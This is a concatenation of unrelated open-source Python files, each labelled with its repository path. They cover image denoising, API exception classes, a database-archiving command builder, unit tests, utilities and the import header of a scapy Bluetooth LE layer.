# -*- coding: utf-8 -*-
# @Time : 2017/7/13 9:56 PM
# @Author : play4fun
# @File : 1-fastNlMeansDenoisingColored.py
# @Software: PyCharm
"""
1-fastNlMeansDenoisingColored.py:
"""
import numpy as np
import cv2
from matplotlib import pyplot as plt
img = cv2.imread('die.png')
img = cv2.cvtColor(img, code=cv2.COLOR_BGR2RGB)
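# cv2.fastNlMeansDenoisingColored(src, dst, h, hColor, templateWindowSize, searchWindowSize):
# h and hColor set the filter strength for the luminance and color components, 7 is the
# template patch size and 21 the search window size (OpenCV's recommended values).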
dst = cv2.fastNlMeansDenoisingColored(img, None, 10, 10, 7, 21)
# dst2=cv2.cvtColor(dst,code=cv2.COLOR_BGR2RGB)
plt.subplot(121), plt.imshow(img)
plt.subplot(122), plt.imshow(dst)
# plt.subplot(122), plt.imshow(dst2)
plt.show()
|
pythonforandroid/recipes/vk/vk/exceptions.py
|
alexben16/python-for-android
| 119 |
84772
|
# API Error Codes
AUTHORIZATION_FAILED = 5 # Invalid access token
PERMISSION_IS_DENIED = 7
CAPTCHA_IS_NEEDED = 14
ACCESS_DENIED = 15 # No access to call this method
INVALID_USER_ID = 113 # User deactivated
class VkException(Exception):
pass
class VkAuthError(VkException):
pass
class VkAPIError(VkException):
__slots__ = ['error', 'code', 'message', 'request_params', 'redirect_uri']
CAPTCHA_NEEDED = 14
ACCESS_DENIED = 15
def __init__(self, error_data):
super(VkAPIError, self).__init__()
self.error_data = error_data
self.code = error_data.get('error_code')
self.message = error_data.get('error_msg')
self.request_params = self.get_pretty_request_params(error_data)
self.redirect_uri = error_data.get('redirect_uri')
@staticmethod
def get_pretty_request_params(error_data):
request_params = error_data.get('request_params', ())
request_params = {param['key']: param['value'] for param in request_params}
return request_params
def is_access_token_incorrect(self):
return self.code == self.ACCESS_DENIED and 'access_token' in self.message
def is_captcha_needed(self):
return self.code == self.CAPTCHA_NEEDED
@property
def captcha_sid(self):
return self.error_data.get('captcha_sid')
@property
def captcha_img(self):
return self.error_data.get('captcha_img')
def __str__(self):
error_message = '{self.code}. {self.message}. request_params = {self.request_params}'.format(self=self)
if self.redirect_uri:
error_message += ',\nredirect_uri = "{self.redirect_uri}"'.format(self=self)
return error_message
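# Illustrative construction from a made-up VK error payload (the keys are the ones this
# class reads; the values are not real):
#
#   err = VkAPIError({'error_code': 14, 'error_msg': 'Captcha needed',
#                     'captcha_sid': '123456', 'captcha_img': 'https://vk.com/captcha.php'})
#   err.is_captcha_needed()   # -> True
#   err.captcha_sid           # -> '123456'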
|
sql/plugins/pt_archiver.py
|
PU-101/Archery
| 3,458 |
84774
|
# -*- coding: UTF-8 -*-
"""
@author: hhyo
@license: Apache Licence
@file: pt_archiver.py
@time: 2020/01/10
"""
from common.config import SysConfig
from sql.plugins.plugin import Plugin
__author__ = 'hhyo'
class PtArchiver(Plugin):
"""
    Archive data with pt-archiver.
"""
def __init__(self):
self.path = 'pt-archiver'
self.required_args = []
self.disable_args = ['analyze']
super(Plugin, self).__init__()
def generate_args2cmd(self, args, shell):
"""
        Convert the request parameters into a pt-archiver command line.
        :param args: dict of pt-archiver options
        :param shell: if True build a single command string, otherwise an argument list
        :return: command string or argument list
"""
k_options = ['no-version-check', 'statistics', 'bulk-insert', 'bulk-delete', 'purge', 'no-delete']
kv_options = ['source', 'dest', 'file', 'where', 'progress', 'charset', 'limit', 'txn-size', 'sleep']
if shell:
cmd_args = self.path if self.path else ''
for name, value in args.items():
if name in k_options and value:
cmd_args += f' --{name}'
elif name in kv_options:
if name == 'where':
cmd_args += f' --{name} "{value}"'
else:
cmd_args += f' --{name} {value}'
else:
cmd_args = [self.path]
for name, value in args.items():
if name in k_options and value:
cmd_args.append(f'--{name}')
elif name in kv_options:
cmd_args.append(f'--{name}')
cmd_args.append(f'{value}')
return cmd_args
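# Illustrative call (option values are made up). With shell=True a single command
# string is built; otherwise a list suitable for subprocess without a shell:
#
#   PtArchiver().generate_args2cmd(
#       {"source": "h=127.0.0.1,D=db,t=tbl", "where": "id<100", "purge": True},
#       shell=True)
#   # -> 'pt-archiver --source h=127.0.0.1,D=db,t=tbl --where "id<100" --purge'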
|
calculate_paremeter_flop.py
|
Edward1900/Face-Detector-1MB-with-landmark
| 907 |
84777
|
from __future__ import print_function
import os
import argparse
import torch
import torch.backends.cudnn as cudnn
import numpy as np
from data import cfg_mnet, cfg_slim, cfg_rfb
from layers.functions.prior_box import PriorBox
from utils.nms.py_cpu_nms import py_cpu_nms
import cv2
from thop import profile
from thop import clever_format
from models.retinaface import RetinaFace
from models.net_slim import Slim
from models.net_rfb import RFB
from utils.box_utils import decode, decode_landm
from utils.timer import Timer
parser = argparse.ArgumentParser(description='Test')
parser.add_argument('--network', default='mobile0.25', help='Backbone network mobile0.25 or slim or RFB')
parser.add_argument('--long_side', default=320, help='when origin_size is false, long_side is scaled size(320 or 640 for long side)')
args = parser.parse_args()
if __name__ == '__main__':
torch.set_grad_enabled(False)
cfg = None
net = None
if args.network == "mobile0.25":
cfg = cfg_mnet
net = RetinaFace(cfg = cfg, phase = 'test')
elif args.network == "slim":
cfg = cfg_slim
net = Slim(cfg = cfg, phase = 'test')
elif args.network == "RFB":
cfg = cfg_rfb
net = RFB(cfg = cfg, phase = 'test')
else:
print("Don't support network!")
exit(0)
long_side = int(args.long_side)
short_side = int(args.long_side/4*3)
img = torch.randn(1, 3, long_side, short_side)
flops, params = profile(net, inputs=(img, ))
flops, params = clever_format([flops, params], "%.3f")
print("param:", params, "flops:", flops)
|
release/stubs.min/Grasshopper/Kernel/Geometry/ConvexHull.py
|
htlcnn/ironpython-stubs
| 182 |
84794
|
# encoding: utf-8
# module Grasshopper.Kernel.Geometry.ConvexHull calls itself ConvexHull
# from Grasshopper,Version=1.0.0.20,Culture=neutral,PublicKeyToken=dda4f5ec2cd80803
# by generator 1.145
""" NamespaceTracker represent a CLS namespace. """
# no imports
# no functions
# classes
class Solver(object):
# no doc
@staticmethod
def Compute(nodes,hull):
""" Compute(nodes: Node2List,hull: List[int]) -> bool """
pass
@staticmethod
def ComputeHull(*__args):
"""
ComputeHull(pts: Node2List) -> Polyline
ComputeHull(GH_pts: IEnumerable[GH_Point],plane: Plane) -> (Polyline,Plane)
ComputeHull(GH_pts: IEnumerable[GH_Point]) -> Polyline
"""
pass
|
zulip_botserver/tests/test_server.py
|
dimisjim/python-zulip-api
| 351 |
84827
|
<gh_stars>100-1000
import json
import os
import unittest
from collections import OrderedDict
from importlib import import_module
from pathlib import Path
from types import ModuleType
from typing import Any, Dict
from unittest import mock
from zulip_bots.finder import metadata
from zulip_bots.lib import BotHandler
from zulip_botserver import server
from zulip_botserver.input_parameters import parse_args
from .server_test_lib import BotServerTestCase
class BotServerTests(BotServerTestCase):
class MockMessageHandler:
def handle_message(self, message: Dict[str, str], bot_handler: BotHandler) -> None:
assert message == {"key": "test message"}
class MockLibModule:
def handler_class(self) -> Any:
return BotServerTests.MockMessageHandler()
def setUp(self) -> None:
        # Initializing Client invokes `get_server_settings`, which fails in the test
        # environment, so we mock it to pretend that a backend exists.
super().setUp()
self.patch = mock.patch("zulip.Client.get_server_settings", return_value=mock.Mock())
self.patch.start()
def test_successful_request(self) -> None:
available_bots = ["helloworld"]
bots_config = {
"helloworld": {
"email": "<EMAIL>",
"key": "123456789qwertyuiop",
"site": "http://localhost",
"token": "<KEY>",
}
}
self.assert_bot_server_response(
available_bots=available_bots,
bots_config=bots_config,
event=dict(
message={"content": "@**test** test message"},
bot_email="<EMAIL>",
trigger="mention",
token="<KEY>",
),
expected_response="beep boop",
check_success=True,
)
def test_successful_request_from_two_bots(self) -> None:
available_bots = ["helloworld", "help"]
bots_config = {
"helloworld": {
"email": "<EMAIL>",
"key": "123456789qwertyuiop",
"site": "http://localhost",
"token": "<KEY>",
},
"help": {
"email": "<EMAIL>",
"key": "123456789qwertyuiop",
"site": "http://localhost",
"token": "<KEY>",
},
}
self.assert_bot_server_response(
available_bots=available_bots,
event=dict(
message={"content": "@**test** test message"},
bot_email="<EMAIL>",
trigger="mention",
token="<KEY>",
),
expected_response="beep boop",
bots_config=bots_config,
check_success=True,
)
    def test_request_for_unknown_bot(self) -> None:
bots_config = {
"helloworld": {
"email": "<EMAIL>",
"key": "123456789qwertyuiop",
"site": "http://localhost",
"token": "<KEY>",
},
}
self.assert_bot_server_response(
available_bots=["helloworld"],
event=dict(message={"content": "test message"}, bot_email="<EMAIL>"),
bots_config=bots_config,
check_success=False,
)
def test_wrong_bot_token(self) -> None:
available_bots = ["helloworld"]
bots_config = {
"helloworld": {
"email": "<EMAIL>",
"key": "123456789qwertyuiop",
"site": "http://localhost",
"token": "<KEY>",
}
}
self.assert_bot_server_response(
available_bots=available_bots,
bots_config=bots_config,
event=dict(
message={"content": "@**test** test message"},
bot_email="<EMAIL>",
trigger="mention",
token="wrongtoken",
),
check_success=False,
)
@mock.patch("logging.error")
@mock.patch("zulip_bots.lib.StateHandler")
def test_wrong_bot_credentials(
self, mock_StateHandler: mock.Mock, mock_LoggingError: mock.Mock
) -> None:
available_bots = ["nonexistent-bot"]
bots_config = {
"nonexistent-bot": {
"email": "<EMAIL>",
"key": "123456789qwertyuiop",
"site": "http://localhost",
"token": "<KEY>",
}
}
with self.assertRaisesRegex(
SystemExit,
'Error: Bot "nonexistent-bot" doesn\'t exist. Please make '
"sure you have set up the botserverrc file correctly.",
):
self.assert_bot_server_response(
available_bots=available_bots,
event=dict(
message={"content": "@**test** test message"},
bot_email="<EMAIL>",
trigger="mention",
token="<KEY>",
),
bots_config=bots_config,
)
@mock.patch("sys.argv", ["zulip-botserver", "--config-file", "/foo/bar/baz.conf"])
def test_argument_parsing_defaults(self) -> None:
opts = parse_args()
assert opts.config_file == "/foo/bar/baz.conf"
assert opts.bot_name is None
assert opts.bot_config_file is None
assert opts.hostname == "127.0.0.1"
assert opts.port == 5002
def test_read_config_from_env_vars(self) -> None:
# We use an OrderedDict so that the order of the entries in
# the stringified environment variable is standard even on
# Python 3.7 and earlier.
bots_config = OrderedDict()
bots_config["hello_world"] = {
"email": "<EMAIL>",
"key": "value",
"site": "http://localhost",
"token": "<KEY>",
}
bots_config["giphy"] = {
"email": "<EMAIL>",
"key": "value2",
"site": "http://localhost",
"token": "<KEY>",
}
os.environ["ZULIP_BOTSERVER_CONFIG"] = json.dumps(bots_config)
# No bot specified; should read all bot configs
assert server.read_config_from_env_vars() == bots_config
# Specified bot exists; should read only that section.
assert server.read_config_from_env_vars("giphy") == {"giphy": bots_config["giphy"]}
# Specified bot doesn't exist; should read the first section of the config.
assert server.read_config_from_env_vars("redefined_bot") == {
"redefined_bot": bots_config["hello_world"]
}
def test_read_config_file(self) -> None:
with self.assertRaises(IOError):
server.read_config_file("nonexistentfile.conf")
current_dir = os.path.dirname(os.path.abspath(__file__))
# No bot specified; should read all bot configs.
bot_conf1 = server.read_config_file(os.path.join(current_dir, "test.conf"))
expected_config1 = {
"helloworld": {
"email": "<EMAIL>",
"key": "value",
"site": "http://localhost",
"token": "<KEY>",
},
"giphy": {
"email": "<EMAIL>",
"key": "value2",
"site": "http://localhost",
"token": "<KEY>",
},
}
assert json.dumps(bot_conf1, sort_keys=True) == json.dumps(expected_config1, sort_keys=True)
# Specified bot exists; should read only that section.
bot_conf3 = server.read_config_file(os.path.join(current_dir, "test.conf"), "giphy")
expected_config3 = {
"giphy": {
"email": "<EMAIL>",
"key": "value2",
"site": "http://localhost",
"token": "<KEY>",
}
}
assert json.dumps(bot_conf3, sort_keys=True) == json.dumps(expected_config3, sort_keys=True)
# Specified bot doesn't exist; should read the first section of the config.
bot_conf2 = server.read_config_file(os.path.join(current_dir, "test.conf"), "redefined_bot")
expected_config2 = {
"redefined_bot": {
"email": "<EMAIL>",
"key": "value",
"site": "http://localhost",
"token": "<KEY>",
}
}
assert json.dumps(bot_conf2, sort_keys=True) == json.dumps(expected_config2, sort_keys=True)
def test_load_lib_modules(self) -> None:
        # This test case intentionally relies on hardcoded paths: if we ever restructure
        # zulip_bots, this test will fail and remind us to update the Botserver at the
        # same time.
helloworld = import_module("zulip_bots.bots.{bot}.{bot}".format(bot="helloworld"))
root_dir = Path(__file__).parents[2].as_posix()
# load valid module name
module = server.load_lib_modules(["helloworld"])["helloworld"]
assert module == helloworld
# load valid file path
path = Path(
root_dir, "zulip_bots/zulip_bots/bots/{bot}/{bot}.py".format(bot="helloworld")
).as_posix()
module = server.load_lib_modules([path])[path]
assert module.__name__ == "custom_bot_module"
assert module.__file__ == path
assert isinstance(module, ModuleType)
# load invalid module name
with self.assertRaisesRegex(
SystemExit,
'Error: Bot "botserver-test-case-random-bot" doesn\'t exist. '
"Please make sure you have set up the botserverrc file correctly.",
):
module = server.load_lib_modules(["botserver-test-case-random-bot"])[
"botserver-test-case-random-bot"
]
# load invalid file path
with self.assertRaisesRegex(
SystemExit,
'Error: Bot "{}/zulip_bots/zulip_bots/bots/helloworld.py" doesn\'t exist. '
"Please make sure you have set up the botserverrc file correctly.".format(root_dir),
):
path = Path(
root_dir, "zulip_bots/zulip_bots/bots/{bot}.py".format(bot="helloworld")
).as_posix()
module = server.load_lib_modules([path])[path]
@mock.patch("zulip_botserver.server.app")
@mock.patch("sys.argv", ["zulip-botserver", "--config-file", "/foo/bar/baz.conf"])
def test_load_from_registry(self, mock_app: mock.Mock) -> None:
packaged_bot_module = mock.MagicMock(__version__="1.0.0", __file__="asd")
packaged_bot_entrypoint = metadata.EntryPoint(
"packaged_bot", "module_name", "zulip_bots.registry"
)
bots_config = {
"packaged_bot": {
"email": "<EMAIL>",
"key": "value",
"site": "http://localhost",
"token": "<KEY>",
}
}
with mock.patch(
"zulip_botserver.server.read_config_file", return_value=bots_config
), mock.patch("zulip_botserver.server.lib.ExternalBotHandler", new=mock.Mock()), mock.patch(
"zulip_bots.finder.metadata.EntryPoint.load",
return_value=packaged_bot_module,
), mock.patch(
"zulip_bots.finder.metadata.entry_points",
return_value=(packaged_bot_entrypoint,),
):
server.main()
mock_app.config.__setitem__.assert_any_call(
"BOTS_LIB_MODULES", {"packaged_bot": packaged_bot_module}
)
if __name__ == "__main__":
unittest.main()
|
InnerEye-DataQuality/InnerEyeDataQuality/selection/data_curation_utils.py
|
faz1993/InnerEye-DeepLearning
| 402 |
84829
|
<reponame>faz1993/InnerEye-DeepLearning
# ------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License (MIT). See LICENSE in the repo root for license information.
# ------------------------------------------------------------------------------------------
import logging
from pathlib import Path
from typing import Any, Dict, List
import numpy as np
import torch
from sklearn.metrics import roc_auc_score
from InnerEyeDataQuality.configs.config_node import ConfigNode
from InnerEyeDataQuality.deep_learning.model_inference import inference_ensemble
from InnerEyeDataQuality.deep_learning.utils import load_selector_config
from InnerEyeDataQuality.selection.selectors.base import SampleSelector
from InnerEyeDataQuality.selection.selectors.bald import BaldSelector
from InnerEyeDataQuality.selection.selectors.graph import GraphBasedSelector, GraphParameters
from InnerEyeDataQuality.selection.selectors.label_based import LabelBasedDecisionRule, PosteriorBasedSelector
from InnerEyeDataQuality.selection.simulation_statistics import get_ambiguous_sample_ids
from InnerEyeDataQuality.utils.custom_types import SelectorTypes as ST
from InnerEyeDataQuality.utils.plot import plot_model_embeddings
def evaluate_ambiguous_case_detection(bald_score: np.ndarray, labels_complete: np.ndarray) -> None:
uncertain_cases = np.zeros_like(bald_score)
true_ambiguous_cases = get_ambiguous_sample_ids(labels_complete)
uncertain_cases[true_ambiguous_cases] = 1
auc_ = roc_auc_score(y_true=uncertain_cases, y_score=bald_score)
logging.info(f'BALD ambiguous detection AUC: {float(auc_):.2f}')
def pretty_selector_name(_type: str, model_name: str) -> str:
type_dict = {'BaldSelector': None,
'PosteriorBasedSelector': None,
'PosteriorBasedSelectorJoint': 'With entropy',
'GraphBasedSelector': 'Graph'}
_type = type_dict[_type] # type: ignore
return f'{model_name} ({_type})' if _type else f'{model_name}'
def get_selector(_type: str, cfg: ConfigNode, **pars: Any) -> SampleSelector:
name = pars["name"]
num_samples = pars["dataset"].num_samples
num_classes = pars["dataset"].num_classes
sample_indices = pars["dataset"].indices
embeddings = pars["embeddings"]
avg_posteriors = pars["avg_posteriors"]
all_posteriors = pars["all_posteriors"]
output_directory = pars["output_directory"]
trainer = pars["trainer"]
use_active_relabelling = pars["use_active_relabelling"]
if ST(_type) is ST.GraphBasedSelector:
distance_metric = "cosine" if (
cfg.model.resnet.apply_l2_norm or cfg.train.use_self_supervision) else "euclidean"
graph_params = GraphParameters(n_neighbors=num_samples // 200,
diffusion_alpha=0.90,
cg_solver_max_iter=10,
diffusion_batch_size=num_samples // 200,
distance_kernel=distance_metric)
return GraphBasedSelector(num_samples, num_classes, embeddings,
sample_indices=sample_indices, name=name,
graph_params=graph_params)
elif ST(_type) is ST.BaldSelector:
return BaldSelector(posteriors=all_posteriors,
num_samples=num_samples,
num_classes=num_classes,
name=name,
trainer=trainer,
use_active_relabelling=use_active_relabelling)
elif ST(_type) is ST.PosteriorBasedSelector:
return PosteriorBasedSelector(avg_posteriors, num_samples, num_classes=num_classes, name=name,
decision_rule=LabelBasedDecisionRule.CROSS_ENTROPY,
output_directory=output_directory, trainer=trainer,
use_active_relabelling=use_active_relabelling)
elif ST(_type) is ST.PosteriorBasedSelectorJoint:
return PosteriorBasedSelector(avg_posteriors, num_samples, num_classes=num_classes, name=name,
decision_rule=LabelBasedDecisionRule.JOINT,
output_directory=output_directory, trainer=trainer,
use_active_relabelling=use_active_relabelling)
else:
raise ValueError("Unknown selector type is specified")
def get_user_specified_selectors(list_configs: List[str],
dataset: Any,
output_path: Path,
plot_embeddings: bool = False) -> Dict[str, SampleSelector]:
"""
    Load the user-specified configs, compute the embeddings and return the selectors.
    :param list_configs: list of selector config file paths
    :param dataset: dataset the selectors operate on
    :param output_path: directory used to save embedding plots
    :param plot_embeddings: whether to plot the model embeddings
    :return: dictionary mapping selector names to selector objects
"""
logging.info("Loading the selector configs:\n {0}".format('\n'.join(list_configs)))
user_specified_selectors = dict()
for cfg in [load_selector_config(cfg) for cfg in list_configs]:
# Collect model probability predictions for the given set of images in the training set.
embeddings, avg_posteriors, all_posteriors, trainer = inference_ensemble(dataset, cfg)
assert avg_posteriors.shape[0] == dataset.num_samples
if plot_embeddings:
sample_label_counts = dataset.label_counts
plot_model_embeddings(embeddings=embeddings, label_distribution=sample_label_counts,
label_names=dataset.get_label_names(), save_path=output_path)
for _type in cfg.selector.type:
selector_params = {"dataset": dataset,
"trainer": trainer if cfg.selector.use_active_relabelling else None,
"embeddings": embeddings,
"avg_posteriors": avg_posteriors,
"all_posteriors": all_posteriors,
"output_directory": cfg.selector.output_directory,
"use_active_relabelling": cfg.selector.use_active_relabelling,
"name": pretty_selector_name(_type, cfg.selector.model_name)}
selector_name = pretty_selector_name(_type, cfg.selector.model_name)
user_specified_selectors[selector_name] = get_selector(_type, cfg, **selector_params)
return user_specified_selectors
def update_trainer_for_simulation(selector: Any, seed: int) -> None:
if selector.trainer is None:
return
    # keep device_id within the range of available GPUs
num_gpus = torch.cuda.device_count()
device_id = seed % num_gpus
# set the device attribute in config object
selector.trainer.config.defrost()
selector.trainer.config.device = device_id
selector.trainer.config.train.seed = seed
selector.trainer.config.train.dataloader.num_workers = 0
selector.trainer.config.validation.dataloader.num_workers = 0
selector.trainer.config.freeze()
selector.trainer.device = torch.device(device_id)
# migrate all parameters to the given device
selector.trainer.models = [model.to(device_id) for model in selector.trainer.models]
|
Packs/ServiceNow/Scripts/ServiceNowIncidentStatus/ServiceNowIncidentStatus.py
|
diCagri/content
| 799 |
84841
|
import demistomock as demisto # noqa: F401
from CommonServerPython import * # noqa: F401
COLORS = {
'1 - New': '#00CD33', # (success green)
'2 - In Progress': '#7995D4', # (royal blue)
'3 - On Hold': '#FF9000', # (warning orange)
'4 - Awaiting Caller': '#FF9000', # (warning orange)
'5 - Awaiting Evidence': '#FF9000', # (warning orange)
'6 - Resolved': '#89A5C1', # (polo)
'7 - Closed': '#9AA0A3', # (natural grey)
'8 - Canceled': '#FF1744' # (alert-red)
}
TEXT = {
'1 - New': 'New',
'2 - In Progress': 'In Progress',
'3 - On Hold': 'On-Hold',
'4 - Awaiting Caller': 'Awaiting Caller',
'5 - Awaiting Evidence': 'Awaiting Evidence',
'6 - Resolved': 'Resolved',
'7 - Closed': 'Closed',
'8 - Canceled': 'Canceled'
}
incident = demisto.incidents()
service_now_state = (incident[0].get('CustomFields', {}).get('servicenowstate'))
try:
text_color = COLORS[service_now_state]
text_content = TEXT[service_now_state]
except Exception as e:
demisto.debug(f'SnowIncidentStatus debug - state is: {service_now_state}\n{e}')
text_color = '#000000'
text_content = 'Pending Update'
html = f"<div style='color:{text_color};text-align:center;'><h2>{text_content}</h2></div>"
demisto.results({
'ContentsFormat': formats['html'],
'Type': entryTypes['note'],
'Contents': html
})
|
lycheesync/utils/boilerplatecode.py
|
bezineb5/lycheesync
| 110 |
84843
|
<filename>lycheesync/utils/boilerplatecode.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
import json
import os
import logging
import logging.config
from lycheesync.utils.configuration import ConfBorg
import sys
logger = logging.getLogger(__name__)
def init_loggers(logconf, verbose=False):
with open(logconf, 'rt') as f:
config = json.load(f)
logging.config.dictConfig(config)
logger.debug("**** logging conf -> read from: " + logconf)
if verbose:
logging.getLogger().setLevel(logging.DEBUG)
for h in logging.getLogger().handlers:
if h.name == "stream_handler":
h.setLevel(logging.DEBUG)
def script_init(cli_args):
"""
    - will initialize a ConfBorg object containing CLI arguments and configuration file elements
- will initialize loggers
"""
root_level = ".."
# compute log file absolute path
pathname = os.path.dirname(sys.argv[0])
full_path = os.path.abspath(pathname)
# root level is different if main.py or sync.py is used to launch script
log_conf_path = os.path.join(full_path, root_level, "ressources", 'logging.json')
log_conf_path2 = os.path.join(full_path, "ressources", 'logging.json')
# append path to configuration
cli_args['full_path'] = full_path
# read log configuration
if os.path.exists(log_conf_path):
init_loggers(log_conf_path, cli_args['verbose'])
elif os.path.exists(log_conf_path2):
init_loggers(log_conf_path2, cli_args['verbose'])
else:
# default value
logging.basicConfig(level=logging.DEBUG)
        logging.warning("**** logging conf -> default conf")
# read application configuration
if os.path.exists(cli_args['confpath']):
with open(cli_args['confpath'], 'rt') as f:
conf = json.load(f)
    else:
        logger.warning("**** Loading default conf in ressources/conf.json")
        conf_path = os.path.join(full_path, root_level, "ressources", 'conf.json')
        conf = {}
        if os.path.exists(conf_path):
            with open(conf_path, 'rt') as f:
                conf = json.load(f)
    # initialize conf with items loaded from the conf file AND command-line arguments
    # cli args have priority over the configuration file
    z = conf.copy()
    z.update(cli_args)
borg = ConfBorg(z)
logger.debug("**** loaded configuration: ")
logger.debug("**** " + borg.pretty)
|
tests/test_api.py
|
gcollard/lightbus
| 178 |
84885
|
import pytest
from lightbus import Api, Event
from lightbus.api import ApiRegistry
from lightbus.exceptions import (
MisconfiguredApiOptions,
InvalidApiEventConfiguration,
InvalidApiRegistryEntry,
UnknownApi,
)
pytestmark = pytest.mark.unit
@pytest.fixture()
def SimpleApi():
class SimpleApi(Api):
class Meta:
name = "simple.api"
return SimpleApi
@pytest.fixture()
def registry():
return ApiRegistry()
def test_api_named_default():
    # APIs cannot use the reserved name 'default'
with pytest.raises(MisconfiguredApiOptions):
class BadApi(Api):
class Meta:
name = "default"
def test_api_named_default_dot_something():
    # APIs cannot use a name starting with 'default.'
with pytest.raises(MisconfiguredApiOptions):
class BadApi(Api):
class Meta:
name = "default.foo"
def test_pass_string_as_event_params():
# Check we cannot accidentally pass a string to Event in the
# case that we omit a ',' when specifying a parameters tuple
with pytest.raises(InvalidApiEventConfiguration):
Event(parameters=("foo"))
def test_api_registry_add_ok(SimpleApi, registry):
registry.add(SimpleApi())
assert "simple.api" in registry._apis
def test_api_registry_add_class(SimpleApi, registry):
with pytest.raises(InvalidApiRegistryEntry):
registry.add(SimpleApi)
def test_api_registry_get_ok(SimpleApi, registry):
api = SimpleApi()
registry.add(api)
assert registry.get("simple.api") == api
def test_api_registry_get_unknown(SimpleApi, registry):
with pytest.raises(UnknownApi):
registry.get("unknown.api")
def test_api_registry_remove_ok(SimpleApi, registry):
registry.add(SimpleApi())
registry.remove("simple.api")
assert not registry._apis
def test_api_registry_remove_unknown(SimpleApi, registry):
with pytest.raises(UnknownApi):
registry.remove("unknown.api")
def test_api_registry_internal(registry):
class InternalApi(Api):
class Meta:
name = "internal.api"
internal = True
api = InternalApi()
registry.add(api)
assert registry.internal() == [api]
assert registry.public() == []
def test_api_registry_public(SimpleApi, registry):
api = SimpleApi()
registry.add(api)
assert registry.public() == [api]
assert registry.internal() == []
def test_api_registry_all(SimpleApi, registry):
api = SimpleApi()
registry.add(api)
assert registry.all() == [api]
def test_api_registry_names(SimpleApi, registry):
api = SimpleApi()
registry.add(api)
assert registry.names() == ["simple.api"]
|
zerver/migrations/0274_nullbooleanfield_to_booleanfield.py
|
TylerPham2000/zulip
| 17,004 |
84892
|
# Generated by Django 2.2.12 on 2020-04-26 17:53
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("zerver", "0273_migrate_old_bot_messages"),
]
operations = [
migrations.AlterField(
model_name="stream",
name="invite_only",
field=models.BooleanField(default=False, null=True),
),
migrations.AlterField(
model_name="subscription",
name="audible_notifications",
field=models.BooleanField(default=None, null=True),
),
migrations.AlterField(
model_name="subscription",
name="desktop_notifications",
field=models.BooleanField(default=None, null=True),
),
migrations.AlterField(
model_name="subscription",
name="email_notifications",
field=models.BooleanField(default=None, null=True),
),
migrations.AlterField(
model_name="subscription",
name="is_muted",
field=models.BooleanField(default=False, null=True),
),
migrations.AlterField(
model_name="subscription",
name="push_notifications",
field=models.BooleanField(default=None, null=True),
),
migrations.AlterField(
model_name="subscription",
name="wildcard_mentions_notify",
field=models.BooleanField(default=None, null=True),
),
migrations.AlterField(
model_name="userprofile",
name="enter_sends",
field=models.BooleanField(default=False, null=True),
),
]
|
examples/simple_eventlet_send.py
|
kaiix/kombu
| 1,920 |
84932
|
<filename>examples/simple_eventlet_send.py
"""
Example that sends a single message and exits using the simple interface.
You can use `simple_receive.py` (or `complete_receive.py`) to receive the
message sent.
"""
import eventlet
from kombu import Connection
eventlet.monkey_patch()
def send_many(n):
#: Create connection
    #: If hostname, userid, password and virtual_host are not specified,
    #: the values below are the defaults, but they are listed here so they
    #: can be easily changed.
with Connection('amqp://guest:guest@localhost:5672//') as connection:
#: SimpleQueue mimics the interface of the Python Queue module.
#: First argument can either be a queue name or a kombu.Queue object.
#: If a name, then the queue will be declared with the name as the
#: queue name, exchange name and routing key.
with connection.SimpleQueue('kombu_demo') as queue:
def send_message(i):
queue.put({'hello': f'world{i}'})
pool = eventlet.GreenPool(10)
for i in range(n):
pool.spawn(send_message, i)
pool.waitall()
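# Minimal receiving-side sketch (a stripped-down version of what
# `simple_receive.py` does), assuming the same broker URL and queue name
# as above; not part of the original example.
def receive_one():
    with Connection('amqp://guest:guest@localhost:5672//') as connection:
        with connection.SimpleQueue('kombu_demo') as queue:
            message = queue.get(block=True, timeout=10)
            print(message.payload)  # e.g. {'hello': 'world0'}
            message.ack()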
if __name__ == '__main__':
send_many(10)
|
ext/scheduler/airflow2/tests/test_compiled_airflow_template.py
|
siddhanta-rath/optimus
| 651 |
84935
|
<gh_stars>100-1000
import unittest
import sys
sys.path.insert(1, '../resources')
import importlib.util
def load_file_as_module(filepath):
spec = importlib.util.spec_from_file_location("dag", filepath)
compiled_dag_lib = importlib.util.module_from_spec(spec)
spec.loader.exec_module(compiled_dag_lib)
return compiled_dag_lib
class TestCompiledAirflowTemplate(unittest.TestCase):
def test_should_run_compiled_airflow_template(self):
compiled_dag_lib = load_file_as_module('../resources/expected_compiled_template.py')
dag = compiled_dag_lib.dag
self.assertEqual('foo', dag.dag_id)
self.assertEqual(5, len(dag.tasks))
self.assertEqual("bq", dag.tasks[0].task_id)
self.assertEqual("hook_transporter", dag.tasks[1].task_id)
self.assertEqual("hook_predator", dag.tasks[2].task_id)
self.assertEqual("wait_foo-intra-dep-job-bq", dag.tasks[3].task_id)
self.assertEqual("wait_foo-inter-dep-job-bq", dag.tasks[4].task_id)
self.assertEqual("SuperKubernetesPodOperator", dag.tasks[0].__class__.__name__)
self.assertEqual("SuperKubernetesPodOperator", dag.tasks[1].__class__.__name__)
self.assertEqual("SuperKubernetesPodOperator", dag.tasks[2].__class__.__name__)
self.assertEqual("SuperExternalTaskSensor", dag.tasks[3].__class__.__name__)
self.assertEqual("CrossTenantDependencySensor", dag.tasks[4].__class__.__name__)
|
03_SweynTooth/libs/scapy/layers/bluetooth4LE.py
|
Charmve/BLE-Security-Att-Def
| 149 |
84941
|
<filename>03_SweynTooth/libs/scapy/layers/bluetooth4LE.py
# This file is for use with Scapy
# See http://www.secdev.org/projects/scapy for more information
# Copyright (C) Airbus DS CyberSecurity
# Authors: <NAME>, <NAME>, <NAME>
# This program is published under a GPLv2 license
"""Bluetooth 4LE layer"""
import struct
from scapy.modules.six.moves import range
from scapy.compat import orb, chb
from scapy.config import conf
from scapy.data import DLT_BLUETOOTH_LE_LL, DLT_BLUETOOTH_LE_LL_WITH_PHDR, DLT_NORDIC_BLE, \
PPI_BTLE
from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \
Field, FlagsField, LEIntField, LEShortEnumField, LEShortField, StrFixedLenField, \
MACField, PacketListField, SignedByteField, LEX3BytesField, \
XBitField, XByteField, XShortField, XLEIntField, XLEShortField
from scapy.layers.bluetooth import EIR_Hdr, L2CAP_Hdr
from scapy.layers.ppi import PPI_Element, PPI_Hdr
from scapy.packet import Packet, bind_layers
from scapy.utils import mac2str, str2mac
####################
# Transport Layers #
####################
